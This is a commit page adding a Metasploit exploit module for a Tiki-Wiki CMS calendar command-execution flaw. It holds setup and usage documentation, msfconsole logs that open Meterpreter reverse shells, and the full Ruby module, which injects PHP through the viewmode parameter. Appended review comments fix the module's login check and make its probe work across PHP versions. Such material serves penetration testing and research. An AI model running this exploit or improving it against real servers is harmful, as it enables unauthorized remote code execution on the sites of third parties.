Land #6992, Add tiki calendar exec exploit

bug/bundler_fix
wchen-r7 2016-06-22 11:18:14 -05:00
commit de5152401a
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
2 changed files with 254 additions and 0 deletions


@ -0,0 +1,103 @@
## Vulnerable Application
* Official Source: [sourceforge](https://sourceforge.net/projects/tikiwiki/files/Tiki_14.x_Peony/14.1/)
* Exploit-db: [edb](https://www.exploit-db.com/apps/2fa84367ba4f14afab9f51cd3e93606d-tiki-14.2.7z)
* Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
**Of note, there is some discussion if 14.2 is vuln or not.**
1. Exploit-DB says in the title (may be wrong) 14.2 is vuln.
2. The linked app Exploit-DB has is 14.2.
3. Its verified on Exploit-DB.
vs
1. Manual print statement testing from the PoC on 14.2 doesn't seem to be vuln
2. The [notice](https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki) seems to say 14.2 is the update that fixes the problem
### Creating A Testing Environment
1. Create a fresh Ubuntu 16.04 w/ a LAMP install
2. `apt-get install php-xml`
3. Normal php install at that point!
4. After install, login as admin:admin
5. Go to the Control Panels
6. Click Features
7. Enable Calendar under Main feature
8. Click Apply
#### Permissions
If you wish to enable the non-logged in user (anonymous) to view/exploit the calendar:
1. Log in as admin
2. From the top dropdown select permissions
3. Check Anonymous near the top
4. Click Assign
## Verification Steps
1. Install the software as documented above
2. Start msfconsole
3. Do: `use exploit/linux/http/tiki_calendar_exec`
4. Do: `set rhost 10.10.10.10`
5. (optional, if not set, set username to empty) Do: `set PASSWORD admin`
6. Do: `set payload php/bind_perl`
7. Do: `set verbose true`
8. Do: `check`
```
[*] Attempting Login
[+] Login Successful!
[+] 10.10.10.10:80 The target is vulnerable.
```
9. Do: `exploit`
10. You should get a shell
```
[*] Started reverse TCP handler on 10.10.10.10:4444
[*] Attempting Login
[+] Login Successful!
[*] Sending malicious calendar view packet
[*] Sending stage (33721 bytes) 10.10.10.10.190
[*] Meterpreter session 1 opened (10.10.10.10:4444 -> 192.168.2.190:48188) at 2016-06-19 08:50:44 -0400
```
## Options
**PASSWORD**
Password is set at first login. Default for admin is 'admin'.
## Scenarios
Example running against unauthenticated calendar v14.1
```
msf > use exploit/linux/http/tiki_calendar_exec
msf exploit(tiki_calendar_exec) > set rhost 192.168.2.190
rhost => 192.168.2.190
msf exploit(tiki_calendar_exec) > set targeturi /t14_1/
targeturi => /t14_1/
msf exploit(tiki_calendar_exec) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(tiki_calendar_exec) > set lhost 192.168.2.229
lhost => 192.168.2.229
msf exploit(tiki_calendar_exec) > set verbose true
verbose => true
msf exploit(tiki_calendar_exec) > set username ''
username =>
msf exploit(tiki_calendar_exec) > exploit
[*] Started reverse TCP handler on 192.168.2.229:4444
[*] Sending malicious calendar view packet
[*] Sending stage (33721 bytes) to 192.168.2.190
[*] Meterpreter session 1 opened (192.168.2.229:4444 -> 192.168.2.190:48172) at 2016-06-18 10:58:19 -0400
meterpreter > sysinfo
Computer : tikiwiki
OS : Linux tikiwiki 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64
Meterpreter : php/php
meterpreter >
```
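Review bot: the sample output in the Verification Steps is internally inconsistent and will confuse anyone matching it against their own run: the reverse handler is shown on `10.10.10.10:4444`, which is the same address set as `rhost` in step 4, the stage line reads `Sending stage (33721 bytes) 10.10.10.10.190` (malformed address, missing `to`), and the session line then connects to `192.168.2.190`. Replace it with one consistent capture, as the Scenarios block already does with lhost 192.168.2.229 and rhost 192.168.2.190. Minor: "Its verified on Exploit-DB" should read "It's verified", and since the doc itself leaves open whether 14.2 is affected, the Scenarios heading might state that the capture is from the 14.1 instance the module was verified against rather than implying the newer build.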


@ -0,0 +1,151 @@
##
## This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Tiki-Wiki CMS Calendar Command Execution',
'Description' => %q(
Tiki-Wiki CMS's calendar module contains a remote code execution
vulnerability within the viewmode GET parameter.
The calendar module is NOT enabled by default. If enabled,
the default permissions are set to NOT allow anonymous users
to access.
Vulnerable versions: <=14.1, <=12.4 LTS, <=9.10 LTS and <=6.14
Verified/Tested against 14.1
),
'Author' =>
[
'h00die <mike@shorebreaksecurity.com>', # module
'Dany Ouellet' # discovery
],
'References' =>
[
[ 'EDB', '39965' ],
[ 'URL', 'https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki']
],
'License' => MSF_LICENSE,
'Platform' => %w( php ),
'Privileged' => false,
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 06 2016'
)
)
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'The URI of Tiki-Wiki', '/']),
OptString.new('USERNAME', [ false, 'Username of a user with calendar access', 'admin']),
OptString.new('PASSWORD', [ false, 'Password of a user with calendar access', 'admin'])
], self.class
)
end
# returns cookie regardless of outcome
def authenticate
begin
# get a cookie to start with
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'tiki-login_scr.php'),
'method' => 'GET'
)
cookie = res ? res.get_cookies : ''
# if we have creds, login with them
vprint_status('Attempting Login')
# the bang on the cgi will follow the redirect we receive on a good login
res = send_request_cgi!(
'uri' => normalize_uri(target_uri.path, 'tiki-login.php'),
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => cookie,
'vars_post' =>
{
'user' => datastore['USERNAME'],
'pass' => datastore['PASSWORD'],
'login' => '',
'stay_in_ssl_mode_present' => 'y',
'stay_in_ssl_mode' => 'n'
}
)
# double check auth worked and we got a Log out on the page.
# at times I got it to auth, but then it would give permission errors
# so we want to try to double check everything is good
if res && !res.body =~ /Log out/
fail_with(Failure::UnexpectedReply, "#{peer} Login Failed with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
end
vprint_good("Login Successful!")
return cookie
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
# sends the calendar packet, returns the HTTP response
def send_calendar_packet(cookie, data)
begin
return send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'tiki-calendar.php'),
'method' => 'GET',
'cookie' => cookie,
'vars_get' =>
{
'viewmode' => "';#{data};$a='"
}
)
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
# Version numbers are post auth, so we send a print statement w/
# 10 random characters and check for it in the response
def check
if datastore['USERNAME'] && !datastore['USERNAME'].blank?
cookie = authenticate
end
flag = Rex::Text.rand_text_alpha(10)
res = send_calendar_packet(cookie, "print(#{flag})")
if res
if res.body =~ /You do not have permission to view the calendar/i
fail_with(Failure::NoAccess, "#{peer} - Additional Permissions Required")
elsif res.body =~ />#{flag}</
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
end
def exploit
if datastore['USERNAME'] && !datastore['USERNAME'].blank?
cookie = authenticate
end
vprint_status('Sending malicious calendar view packet')
res = send_calendar_packet(cookie, payload.encoded)
if res && res.body =~ /You do not have permission to view the calendar/i
fail_with(Failure::NoAccess, "#{peer} - Additional Permissions Required")
end
end
end
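Review bot: the login check in `authenticate` never fires because of operator precedence: `!res.body =~ /Log out/` parses as `(!res.body) =~ /Log out/`, and `false =~ regex` is always nil, so a failed login falls through to `vprint_good("Login Successful!")` and returns the unauthenticated cookie. Change it to `if res && res.body !~ /Log out/` (or `!(res.body =~ /Log out/)`). Two smaller points in `check`: it returns nil when `send_calendar_packet` gets no response, which is not a valid CheckCode, so add an `Exploit::CheckCode::Unknown` branch; and `fail_with` inside `check` raises instead of reporting, where the usual pattern is a `vprint_error` plus `Exploit::CheckCode::Safe`. Finally, the probe `print(#{flag})` sends the random flag as a bare PHP identifier and relies on PHP's undefined-constant-to-string fallback (a notice on PHP 5/7.0, deprecated in 7.2, an Error in PHP 8); quoting it as `print('#{flag}')` makes the check robust across target PHP versions.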